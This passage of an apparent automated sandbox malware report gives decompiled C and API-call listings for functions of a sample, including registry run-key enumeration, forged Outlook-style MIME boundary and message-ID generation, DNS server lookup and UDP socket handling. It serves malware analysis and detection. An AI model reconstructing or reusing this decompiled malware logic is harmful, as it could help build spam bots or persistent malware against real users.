                                                                                • API String ID: 1628651668-1974347203
                                                                                • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction ID: eb7b11ed4c53c948c266725589cd2bd5011abf538380d47c3ee2616faaf710b6
                                                                                • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction Fuzzy Hash: 2EF17CB15083419FD720CF64C888BABBBE4FBC9305F10896DF596A7290D7B4D944CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E37666 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00E376D9
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 00E37757
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 00E3778F
                                                                                • ___ascii_stricmp.LIBCMT ref: 00E378B4
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E3794E
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00E3796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E3797E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E379AC
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E37A56
                                                                                  • Part of subcall function 00E3F40C: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,00E3772A,?), ref: 00E3F414
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00E379F6
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E37A4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "
                                                                                • API String ID: 3433985886-123907689
                                                                                • Opcode ID: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction ID: 598543b073969cb89e6693c132daf4115355dedefa96f9f9e6bc49f3fd328f43
                                                                                • Opcode Fuzzy Hash: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction Fuzzy Hash: 77C1C1B2904209AFEB219BA4DC4DFEEBFB9AF44310F1051A5F544F6191EB708E80CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040704C Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				int _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				void* _t166;
				int _t196;
				int _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t207;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t206 = _t204 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t207 = _t206 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t207 = _t207 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											asm("popad");
											asm("popad");
											asm("popad");
											asm("popad");
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = 0x4122f8;
											_t166 = 0xad;
											_t123 = E00406C96(0x4122f8);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											_t71 = _t166 - 0x40; // 0x4122b8
											__eflags = _t71 - 0x3f;
											if(_t71 > 0x3f) {
												goto L57;
											}
											__eflags = 0xf8 - 0x10;
											if(0xf8 >= 0x10) {
												goto L57;
											}
											_t202 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t202;
											if(_t202 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t202 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t204 = _t206 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x61616161;
						__eflags = _t158 - (_v32 ^ 0x61616161);
						if(_t158 == (_v32 ^ 0x61616161)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}









































                                                                                0x00407055
                                                                                0x00407058
                                                                                0x0040705a
                                                                                0x00407061
                                                                                0x00407068
                                                                                0x00407071
                                                                                0x00407073
                                                                                0x00407073
                                                                                0x00407075
                                                                                0x0040707a
                                                                                0x0040707c
                                                                                0x0040707c
                                                                                0x0040707e
                                                                                0x00407083
                                                                                0x00407085
                                                                                0x00407085
                                                                                0x00407087
                                                                                0x0040708c
                                                                                0x0040708e
                                                                                0x0040708e
                                                                                0x004070b4
                                                                                0x004070b9
                                                                                0x004070ca
                                                                                0x004071b8
                                                                                0x004071c8
                                                                                0x00000000
                                                                                0x004070d0
                                                                                0x004070d0
                                                                                0x004070d8
                                                                                0x004070df
                                                                                0x004070e3
                                                                                0x004070e4
                                                                                0x004070e9
                                                                                0x004070ed
                                                                                0x004070ee
                                                                                0x004070f1
                                                                                0x004070f2
                                                                                0x004070f5
                                                                                0x0040719b
                                                                                0x0040719e
                                                                                0x004071a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004070fb
                                                                                0x004070fd
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x00407174
                                                                                0x0040717b
                                                                                0x0040717f
                                                                                0x00407180
                                                                                0x00407185
                                                                                0x00407189
                                                                                0x0040718a
                                                                                0x0040718d
                                                                                0x00407194
                                                                                0x00000000
                                                                                0x00407194
                                                                                0x004070ff
                                                                                0x00407102
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407104
                                                                                0x00407107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407109
                                                                                0x0040710d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407123
                                                                                0x00407128
                                                                                0x0040712d
                                                                                0x0040712f
                                                                                0x0040712f
                                                                                0x00407130
                                                                                0x00407133
                                                                                0x004071d0
                                                                                0x004071f4
                                                                                0x004071f7
                                                                                0x004071fc
                                                                                0x004071ff
                                                                                0x00407203
                                                                                0x00407227
                                                                                0x0040722e
                                                                                0x0040723e
                                                                                0x0040724c
                                                                                0x00407251
                                                                                0x00407254
                                                                                0x00407256
                                                                                0x00407258
                                                                                0x00407258
                                                                                0x00407256
                                                                                0x00407280
                                                                                0x00407282
                                                                                0x0040728a
                                                                                0x0040728c
                                                                                0x004072c2
                                                                                0x004072c9
                                                                                0x004072cb
                                                                                0x004072e6
                                                                                0x004072e8
                                                                                0x004072ef
                                                                                0x004072f2
                                                                                0x004072f4
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x004072f6
                                                                                0x004072fc
                                                                                0x004072fc
                                                                                0x00407307
                                                                                0x0040730d
                                                                                0x0040730f
                                                                                0x00407335
                                                                                0x00407336
                                                                                0x00407337
                                                                                0x00407338
                                                                                0x00407339
                                                                                0x0040733e
                                                                                0x0040734b
                                                                                0x0040734e
                                                                                0x00407354
                                                                                0x0040735b
                                                                                0x0040735d
                                                                                0x004073d5
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e2
                                                                                0x004073eb
                                                                                0x004073f1
                                                                                0x004073f2
                                                                                0x004073f4
                                                                                0x004073f7
                                                                                0x00000000
                                                                                0x004073f7
                                                                                0x0040735f
                                                                                0x00407362
                                                                                0x00407365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040736d
                                                                                0x00407370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407372
                                                                                0x00407375
                                                                                0x0040737a
                                                                                0x0040737c
                                                                                0x0040738d
                                                                                0x00407393
                                                                                0x00407395
                                                                                0x00407397
                                                                                0x00407397
                                                                                0x00407395
                                                                                0x0040739d
                                                                                0x004073a0
                                                                                0x004073a2
                                                                                0x004073a4
                                                                                0x004073a4
                                                                                0x004073a6
                                                                                0x004073a9
                                                                                0x004073b2
                                                                                0x004073b8
                                                                                0x004073b9
                                                                                0x004073bc
                                                                                0x004073c4
                                                                                0x004073ca
                                                                                0x004073cb
                                                                                0x004073cd
                                                                                0x00000000
                                                                                0x00407311
                                                                                0x00407314
                                                                                0x0040731a
                                                                                0x0040731d
                                                                                0x00407326
                                                                                0x0040732c
                                                                                0x0040732d
                                                                                0x00000000
                                                                                0x0040732d
                                                                                0x0040730f
                                                                                0x004072d0
                                                                                0x004072d6
                                                                                0x00000000
                                                                                0x0040728e
                                                                                0x00407291
                                                                                0x00407297
                                                                                0x0040729a
                                                                                0x004072a3
                                                                                0x004072a9
                                                                                0x004072aa
                                                                                0x004072aa
                                                                                0x004072ac
                                                                                0x004072af
                                                                                0x004072b2
                                                                                0x004071cb
                                                                                0x004071cf
                                                                                0x004071cf
                                                                                0x0040728c
                                                                                0x00407208
                                                                                0x0040720e
                                                                                0x00407212
                                                                                0x0040721b
                                                                                0x00407221
                                                                                0x00407224
                                                                                0x00000000
                                                                                0x00407224
                                                                                0x0040713d
                                                                                0x00407142
                                                                                0x00407143
                                                                                0x00407145
                                                                                0x0040715e
                                                                                0x00407166
                                                                                0x0040716b
                                                                                0x00000000
                                                                                0x0040716b
                                                                                0x0040714b
                                                                                0x00407154
                                                                                0x0040715a
                                                                                0x0040715c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040715c
                                                                                0x004071b2
                                                                                0x00000000
                                                                                0x004071b2

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 004070C2
                                                                                • RegEnumValueA.ADVAPI32(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0040719E
                                                                                • RegCloseKey.ADVAPI32(74CB43E0,?,74CB43E0,00000000), ref: 004071B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407291
                                                                                • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004072D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004073D8
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"
                                                                                • API String ID: 4293430545-3817095088
                                                                                • Opcode ID: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction ID: 42610d5d4912e138811464987e42a56107d9bf2f6382ea6b9d81aa24fc4965e2
                                                                                • Opcode Fuzzy Hash: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction Fuzzy Hash: B5B17071D08209BAEB159FA1DC45BEF77B8AB04304F20047BF501F61D1EB79AA94CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E32CC9 Relevance: 21.2, APIs: 14, Instructions: 194memorynetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E32CED
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00E32D07
                                                                                • htons.WS2_32(00000000), ref: 00E32D42
                                                                                • select.WS2_32 ref: 00E32D8F
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00E32DB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00E32E62
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 127016686-0
                                                                                • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction ID: 496758bdfdb7cfca6714514c796975dd2d7d260ee4092cc54aa07fac39845932
                                                                                • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction Fuzzy Hash: 0461DC71904305ABC321AF65DC0DBABBFE8EB88345F11581DFAC4A6161D7B49880CBA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                0x0040ad89
                                                                                0x0040ad8a
                                                                                0x0040ad98
                                                                                0x0040ada6
                                                                                0x0040adba
                                                                                0x0040adc6
                                                                                0x0040adcb
                                                                                0x0040add5
                                                                                0x0040adeb
                                                                                0x0040add7
                                                                                0x0040addd
                                                                                0x0040ade6
                                                                                0x0040ade6
                                                                                0x0040adf5
                                                                                0x0040adfe
                                                                                0x0040ae03
                                                                                0x0040ae0f
                                                                                0x0040ae18
                                                                                0x0040ae1b
                                                                                0x0040ae7f
                                                                                0x0040ae81
                                                                                0x0040ae83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae31
                                                                                0x0040ae3f
                                                                                0x0040ae3f
                                                                                0x0040ae43
                                                                                0x0040ae4f
                                                                                0x0040ae5e
                                                                                0x0040ae6e
                                                                                0x0040ae73
                                                                                0x0040ae7a
                                                                                0x0040ae7a
                                                                                0x0040aea5
                                                                                0x0040aeb6
                                                                                0x0040aedc

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                  • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                  • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                  • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                  • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                • wsprintfA.USER32 ref: 0040AEA5
                                                                                  • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                • wsprintfA.USER32 ref: 0040AE4F
                                                                                • wsprintfA.USER32 ref: 0040AE5E
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                • API String ID: 3631595830-1816598006
                                                                                • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                0x00402dfb
                                                                                0x00402e01
                                                                                0x00402e09
                                                                                0x00402e11
                                                                                0x00402e11
                                                                                0x00402e19
                                                                                0x00402ef1
                                                                                0x00000000
                                                                                0x00402e28
                                                                                0x00402e34
                                                                                0x00402e38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e4f
                                                                                0x00402e55
                                                                                0x00402e5a
                                                                                0x00402e5d
                                                                                0x00402e60
                                                                                0x00402e64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e6d
                                                                                0x00402e70
                                                                                0x00402e76
                                                                                0x00402ede
                                                                                0x00402ee6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e78
                                                                                0x00402e78
                                                                                0x00402e78
                                                                                0x00402e7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e81
                                                                                0x00402e84
                                                                                0x00402e88
                                                                                0x00402e8f
                                                                                0x00402e93
                                                                                0x00402e99
                                                                                0x00402e9e
                                                                                0x00402ea6
                                                                                0x00402eae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402eb5
                                                                                0x00402eb7
                                                                                0x00000000
                                                                                0x00402eba
                                                                                0x00402eba
                                                                                0x00402ebc
                                                                                0x00402eca
                                                                                0x00402ed0
                                                                                0x00402ed1
                                                                                0x00402ed6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ed6
                                                                                0x00402ebc
                                                                                0x00402ed8
                                                                                0x00402ed8
                                                                                0x00402eda
                                                                                0x00000000
                                                                                0x00402e78

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                • htons.WS2_32(00000035), ref: 00402E88
                                                                                • inet_addr.WS2_32(?), ref: 00402E93
                                                                                • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
